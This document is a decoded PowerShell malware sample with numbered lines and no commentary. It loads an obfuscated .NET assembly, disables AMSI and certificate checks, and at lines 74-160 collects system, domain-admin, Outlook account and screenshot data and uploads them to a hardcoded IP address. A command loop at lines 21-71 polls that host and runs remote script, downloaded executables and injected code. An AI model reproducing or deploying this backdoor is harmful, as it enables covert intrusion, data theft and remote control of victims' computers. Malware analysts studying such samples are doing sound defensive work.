Decoded

1. $NNLYGF = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4yMTA="))
2. $cyzdkER = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("MZ^C^D@^N^_^N !^AL!This program cannot be run in DOS mode.
3. $PEL^A^CF]^^B!^K^A^H$^FB `@ ^B^D^D^B^C@^P^P^P^P^PBK`^B^L^H H.text" $^B `.rsrc^B`^D&@@.reloc^L^B*@BBH^B^E1^P^A^S0^D!^A^A^Q^Br^Apo^F
4. Module>tools.dllVOSuZYD8FNKOxAbCmS6aZr57rLmscorlibSystemObjectMulticastDelegateVirtualAllocCreateThreadGetExitCodeThreadWaitForSingleObjectciigDofE2WJKuCPMXAeavFzIAwjrVzS
5. ystem.ReflectionAssemblyEY8boPKQ66jxWGGzCVW4NFU96JN1jsIFABX0gUS0qiEEH2hcikKINKE7eLklFpgmeHqrGdVhyf0Ao3srLCSD0NpfmZzGsvKNWvNloWsf0gNbVY3kORjoXPXYJ0NBBsB30BKDm66dTucfS08BLyHjD.ctorInvokeIAsyncResultAsyncCallbackBeginInvokeEndInvokeabcdefSystem.Run
6. time.InteropServicesMarshalAsAttributeUnmanagedTypeOutAttributebytessinputoutputkeydataividstatuspostobjectmethodparamcallbackresultSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributetoolsDllImportAttribut
7. ekernel32kernel32.dllTypeGetTypeFieldInfoBindingFlagsGetFieldBooleanSetValueEnvironmentOperatingSystemget_OSVersionVersionget_VersionSystem.Security.PrincipalWindowsIdentityGetCurrentSecurityIdentifierget_UserIdentityReferenceget_ValueCharString
8. SplitSystem.IOMemoryStreamBinaryWriterStreamUInt32ParseWriteSystem.TextEncodingget_Unicodeget_MachineNameGetBytesIntPtrget_Sizeget_Majorget_Minorget_BuildCloseToArrayEmptyStringBuilderAppendToStringget_LengthRandomget_CharsNextByteBitConverterTo
9. UInt32ConcatNextBytesArrayCopyBinaryReaderReadUInt32ReadBytesMarshalToInt64Zeroop_Explicitop_EqualityGetLastWin32ErrorRuntimeTypeHandleGetTypeFromHandleDelegateGetDelegateForFunctionPointer.cctor<PrivateImplementationDetails>{ABD96C57-B1A0-4231-
10. 99EC-8FB36F9D429D}CompilerGeneratedAttributeValueType__StaticArrayInitTypeSize=808$$method0x6000017-1RuntimeHelpersRuntimeFieldHandleInitializeArray__StaticArrayInitTypeSize=1019$$method0x6000017-2UnmanagedFunctionPointerAttributeCallingConventi
11. onMSystem.Management.Automation.AmsiUtils^]amsiInitFailed^C/ .asp .jpgWl1Boz\V
12.  
13. ^AInternalNametools.dll(^B^ALegalCopyright <
14. ^AOriginalFilenametools.dll^AProductVersion0.0.0.0^AAssembly Version0.0.0.0@^L2"), [IO.Compression.CompressionMode]::Decompress)
15. $rbUlVfzYtPXFVR = New-Object byte[](20480)
16. $cyzdkER.Read($rbUlVfzYtPXFVR, 0, 20480) | Out-Null
17. [System.Reflection.Assembly]::Load($rbUlVfzYtPXFVR) | Out-Null
18. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
19. [VOSuZYD8FN.VOSuZYD8FN]::EY8boPKQ66jxWGG([Ref].Assembly)
20. iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZnVuY3Rpb24gellXWXA4UklzKFtzdHJpbmddICRwYXRoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICB0cnkgewogICAgICAgICRIdzY2bVZnWUsgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAkcGF0aCB8IFdoZXJlIHskXyAtbWF0Y2ggJ0FjY291bnQgTmFtZSd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS4iQWNjb3VudCBOYW1lIi5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLiJBY2NvdW50IE5hbWUiKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS4iQWNjb3VudCBOYW1lIn0KICAgICAgICAgICAgICAgIGlmICgkbWwgLW1hdGNoICJAIikgewogICAgICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0KICAgICAgICAkSHc2Nm1WZ1lLID0gKEdldC1JdGVtUHJvcGVydHkgJHBhdGggfCBXaGVyZSB7JF8gLW1hdGNoICdFbWFpbCd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS5FbWFpbC5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLkVtYWlsKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS5FbWFpbH0KICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0gICAgICAgIAogICAgfSBjYXRjaCB7fQogICAgJEJFVmkydHoKfQpmdW5jdGlvbiBxeXVCaE5EOHltQnphaihbaW50XSRBNXd1ckdra3FIUE9EbiwgW2J5dGVbXV0kQ1gxZW9ZNTREKQp7CiAgICAkWG1qellOVm94cXkgPSAiaHR0cHM6Ly8kTk5MWUdGLyIgKyBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6cGZtWnpHc3ZLTld2TmwoJEE1d3VyR2trcUhQT0RuLCAwLCAkdHJ1ZSkKICAgICRhWTRZMmdaTjEgPSBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6b1dzZjBnTmIoJENYMWVvWTU0RCkKICAgIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5VcGxvYWREYXRhKCRYbWp6WU5Wb3hxeSwgJGFZNFkyZ1pOMSkKfQpmdW5jdGlvbiB3alJ6Qmsydmt2KCkKewogICAgaWYgKCgoKEdldC1XbWlPYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW0pLnBhcnRvZmRvbWFpbikgLWVxICRGYWxzZSApIC1vciAoIC1ub3QgJEVudjpVU0VSRE5TRE9NQUlOKSkKICAgIHsKICAgICAgICAkQkVWaTJ0eiA9ICJET01BSU46IE5PYG5gbiIKICAgIH0gZWxzZSB7ICRCRVZpMnR6ID0gIkRPTUFJTjogWUVTYG5gbiJ9CiAgICAkQkVWaTJ0eiArPSAiU1lTVEVNSU5GTzpgbmBuIiArICgoc3lzdGVtaW5mbykgLWpvaW4gImBuIikKICAgICRCRVZpMnR6ICs9ICJgbmBuSVBDT05GSUc6YG5gbiIgKyAoKGlwY29uZmlnIC9hbGwpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFNUQVQ6YG5gbiIgKyAoKG5ldHN0YXQgLWYpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFZJRVc6YG5gbiIgKyAoKG5ldCB2aWV3KSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5UQVNLTElTVDpgbmBuIiArICgodGFza2xpc3QpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbldIT0FNSTpgbmBuIiArICgod2hvYW1pKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5VU0VSTkFNRTpgbmBuIiArICgobmV0IHVzZXIgJGVudjp1c2VybmFtZSAvZG9tYWluKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ET01BSU4gQURNSU5TOmBuYG4iICsgKChuZXQgZ3JvdXAgImRvbWFpbiBhZG1pbnMiIC9kb21haW4gKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ERVNLVE9QOmBuYG4iICsgKEdldC1DaGlsZEl0ZW0gKFtlbnZpcm9ubWVudF06OmdldGZvbGRlcnBhdGgoImRlc2t0b3AiKSkgfCBPdXQtU3RyaW5nKQogICAgJEJFVmkydHogKz0gImBuYG5BVjpgbmBuIiArIChHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIpLmRpc3BsYXlOYW1lCiAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgIHF5dUJoTkQ4eW1CemFqIDAgJENYMWVvWTU0RAp9CmZ1bmN0aW9uIGM3RUpKWDUoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICAkQkVWaTJ0eiArPSB6WVdZcDhSSXMgImhrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxPZmZpY2VcMTYuMFxPdXRsb29rXFByb2ZpbGVzXCpcOTM3NUNGRjA0MTMxMTFkM0I4OEEwMDEwNEIyQTY2NzZcKiIKICAgICRCRVZpMnR6ICs9IHpZV1lwOFJJcyAiaGtjdTpcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcKlw5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgJEJFVmkydHogKz0gellXWXA4UklzICJoa2N1OlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxXaW5kb3dzIE1lc3NhZ2luZyBTdWJzeXN0ZW1cUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgaWYgKCRCRVZpMnR6IC1uZSAiIikKICAgIHsKICAgICAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgICAgICBxeXVCaE5EOHltQnphaiAxICRDWDFlb1k1NEQKICAgIH0KfQpmdW5jdGlvbiBudVFuaFQ1ZUszQnhydHRWKCkKewogICAgQWRkLVR5cGUgLUFzc2VtYmx5IFN5c3RlbS5XaW5kb3dzLkZvcm1zCiAgICAkR243NDR2SiA9IFtXaW5kb3dzLkZvcm1zLlN5c3RlbUluZm9ybWF0aW9uXTo6VmlydHVhbFNjcmVlbgogICAgJHhNSENaTzk4V1dXeDdaeCA9IE5ldy1PYmplY3QgRHJhd2luZy5CaXRtYXAgJEduNzQ0dkouV2lkdGgsICRHbjc0NHZKLkhlaWdodAogICAgJERSeXdrc2hCQmhwID0gW0RyYXdpbmcuR3JhcGhpY3NdOjpGcm9tSW1hZ2UoJHhNSENaTzk4V1dXeDdaeCkKICAgICREUnl3a3NoQkJocC5Db3B5RnJvbVNjcmVlbigkR243NDR2Si5Mb2NhdGlvbiwgW0RyYXdpbmcuUG9pbnRdOjpFbXB0eSwgJEduNzQ0dkouU2l6ZSkKICAgICREUnl3a3NoQkJocC5EaXNwb3NlKCkKICAgICRCWEQyMk82ID0gTmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtCiAgICAkVHNDRDR4dE09NDAKICAgICRhWTRZMmdaTjFvZGVyUGFyYW1zID0gTmV3LU9iamVjdCBTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXJzCiAgICAkYVk0WTJnWk4xb2RlclBhcmFtcy5QYXJhbVswXSA9IE5ldy1PYmplY3QgRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXIgKFtTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJdOjpRdWFsaXR5LCAkVHNDRDR4dE0pCiAgICAkV0RqcXpLWlVKbyA9IFtEcmF3aW5nLkltYWdpbmcuSW1hZ2VDb2RlY0luZm9dOjpHZXRJbWFnZUVuY29kZXJzKCkgfCBXaGVyZS1PYmplY3QgeyAkXy5Gb3JtYXREZXNjcmlwdGlvbiAtZXEgIkpQRUciIH0KICAgICR4TUhDWk85OFdXV3g3Wnguc2F2ZSgkQlhEMjJPNiwgJFdEanF6S1pVSm8sICRhWTRZMmdaTjFvZGVyUGFyYW1zKQogICAgJHhNSENaTzk4V1dXeDdaeC5EaXNwb3NlKCkKICAgICRDWDFlb1k1NEQgPSBbY29udmVydF06OlRvQmFzZTY0U3RyaW5nKCRCWEQyMk82LlRvQXJyYXkoKSkKICAgICRDWDFlb1k1NEQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygkQ1gxZW9ZNTREKQogICAgcXl1QmhORDh5bUJ6YWogMiAkQ1gxZW9ZNTRECn0Kd2pSekJrMnZrdgpjN0VKSlg1Cm51UW5oVDVlSzNCeHJ0dFY=")))
21. while ($true)
22. {
23. $te3w8Flw = New-Object System.Net.WebClient
24. $Qo4VVv = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl(0, 0, $False)
25. $o2DtmQ7f0UJFsmJi = $te3w8Flw.DownloadData($Qo4VVv)
26. if ($o2DtmQ7f0UJFsmJi.Length -ge 48)
27. {
28. $XwlJhkbtP = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 0)
29. $iJ9xO2Wezr = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 4)
30. $tObLrJ = [VOSuZYD8FN.VOSuZYD8FN]::VY3kORjoXPXYJ0N($o2DtmQ7f0UJFsmJi[8..$o2DtmQ7f0UJFsmJi.Length])
31. $AfHhsmJSgK1ruO = 100
32. $DzHOZ5W = $False
33. if ($tObLrJ -ne $null)
34. {
35. if ($XwlJhkbtP -eq 0)
36. {
37. $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::BBsB30BKDm66($tObLrJ)
38. }
39. elseif ($XwlJhkbtP -eq 1)
40. {
41. try {
42. $wLPf5Q11AUnp5XaA = iex ([System.Text.Encoding]::UTF8.GetString($tObLrJ)) -ErrorAction Stop | Format-Table -wrap | Out-String
43. } catch {
44. $wLPf5Q11AUnp5XaA = $_.Exception
45. }
46. $wLPf5Q11AUnp5XaA = [System.Text.Encoding]::UTF8.GetBytes($wLPf5Q11AUnp5XaA)
47. qyuBhND8ymBzaj 3 $wLPf5Q11AUnp5XaA
48. $AfHhsmJSgK1ruO = 0
49. }
50. elseif ($XwlJhkbtP -eq 2)
51. {
52. $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::dTucfS08BLyHjD($tObLrJ)
53. }
54. elseif ($XwlJhkbtP -eq 3)
55. {
56. $ROcjouD = Get-Random
57. $SacHMK7Mj0 = "$env:TEMP\$ROcjouD.exe"
58. [System.IO.File]::WriteAllBytes($SacHMK7Mj0, $tObLrJ)
59. $AfHhsmJSgK1ruO = 0
60. try {
61. Start-Process $SacHMK7Mj0 -windowstyle hidden -ErrorAction Stop
62. Start-Sleep -s 9
63. Remove-Item $SacHMK7Mj0
64. } catch { $AfHhsmJSgK1ruO = 1}
65. }
66. elseif ($XwlJhkbtP -eq 99) { $AfHhsmJSgK1ruO = 0; $DzHOZ5W = $true}
67. }
68. $te3w8Flw.DownloadData("https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($iJ9xO2Wezr, $AfHhsmJSgK1ruO, $False)) | Out-Null
69. }
70. if ($DzHOZ5W) { Exit }
71. Start-Sleep -s (Get-Random -Input @(198..249))
72.  
73.  
74. ################
75. function zYWYp8RIs([string] $path)
76. {
77. $BEVi2tz = ""
78. try {
79. $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
80. foreach ($m in $Hw66mVgYK) {
81. try {
82. if ($m."Account Name".GetType().IsArray) {
83. $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
84. } else {$ml = $m."Account Name"}
85. if ($ml -match "@") {
86. $BEVi2tz += "email: " + $ml + "`n"
87. }
88. } catch {}
89. }
90. $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Email'})
91. foreach ($m in $Hw66mVgYK) {
92. try {
93. if ($m.Email.GetType().IsArray) {
94. $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
95. } else {$ml = $m.Email}
96. $BEVi2tz += "email: " + $ml + "`n"
97. } catch {}
98. }
99. } catch {}
100. $BEVi2tz
101. }
102. function qyuBhND8ymBzaj([int]$A5wurGkkqHPODn, [byte[]]$CX1eoY54D)
103. {
104. $XmjzYNVoxqy = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($A5wurGkkqHPODn, 0, $true)
105. $aY4Y2gZN1 = [VOSuZYD8FN.VOSuZYD8FN]::oWsf0gNb($CX1eoY54D)
106. (New-Object System.Net.WebClient).UploadData($XmjzYNVoxqy, $aY4Y2gZN1)
107. }
108. function wjRzBk2vkv()
109. {
110. if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
111. {
112. $BEVi2tz = "DOMAIN: NO`n`n"
113. } else { $BEVi2tz = "DOMAIN: YES`n`n"}
114. $BEVi2tz += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
115. $BEVi2tz += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
116. $BEVi2tz += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
117. $BEVi2tz += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
118. $BEVi2tz += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
119. $BEVi2tz += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
120. $BEVi2tz += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
121. $BEVi2tz += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
122. $BEVi2tz += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
123. $BEVi2tz += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
124. $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
125. qyuBhND8ymBzaj 0 $CX1eoY54D
126. }
127. function c7EJJX5()
128. {
129. $BEVi2tz = ""
130. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
131. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
132. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
133. if ($BEVi2tz -ne "")
134. {
135. $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
136. qyuBhND8ymBzaj 1 $CX1eoY54D
137. }
138. }
139. function nuQnhT5eK3BxrttV()
140. {
141. Add-Type -Assembly System.Windows.Forms
142. $Gn744vJ = [Windows.Forms.SystemInformation]::VirtualScreen
143. $xMHCZO98WWWx7Zx = New-Object Drawing.Bitmap $Gn744vJ.Width, $Gn744vJ.Height
144. $DRywkshBBhp = [Drawing.Graphics]::FromImage($xMHCZO98WWWx7Zx)
145. $DRywkshBBhp.CopyFromScreen($Gn744vJ.Location, [Drawing.Point]::Empty, $Gn744vJ.Size)
146. $DRywkshBBhp.Dispose()
147. $BXD22O6 = New-Object System.IO.MemoryStream
148. $TsCD4xtM=40
149. $aY4Y2gZN1oderParams = New-Object System.Drawing.Imaging.EncoderParameters
150. $aY4Y2gZN1oderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $TsCD4xtM)
151. $WDjqzKZUJo = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
152. $xMHCZO98WWWx7Zx.save($BXD22O6, $WDjqzKZUJo, $aY4Y2gZN1oderParams)
153. $xMHCZO98WWWx7Zx.Dispose()
154. $CX1eoY54D = [convert]::ToBase64String($BXD22O6.ToArray())
155. $CX1eoY54D = [System.Text.Encoding]::ASCII.GetBytes($CX1eoY54D)
156. qyuBhND8ymBzaj 2 $CX1eoY54D
157. }
158. wjRzBk2vkv
159. c7EJJX5
160. nuQnhT5eK3BxrttV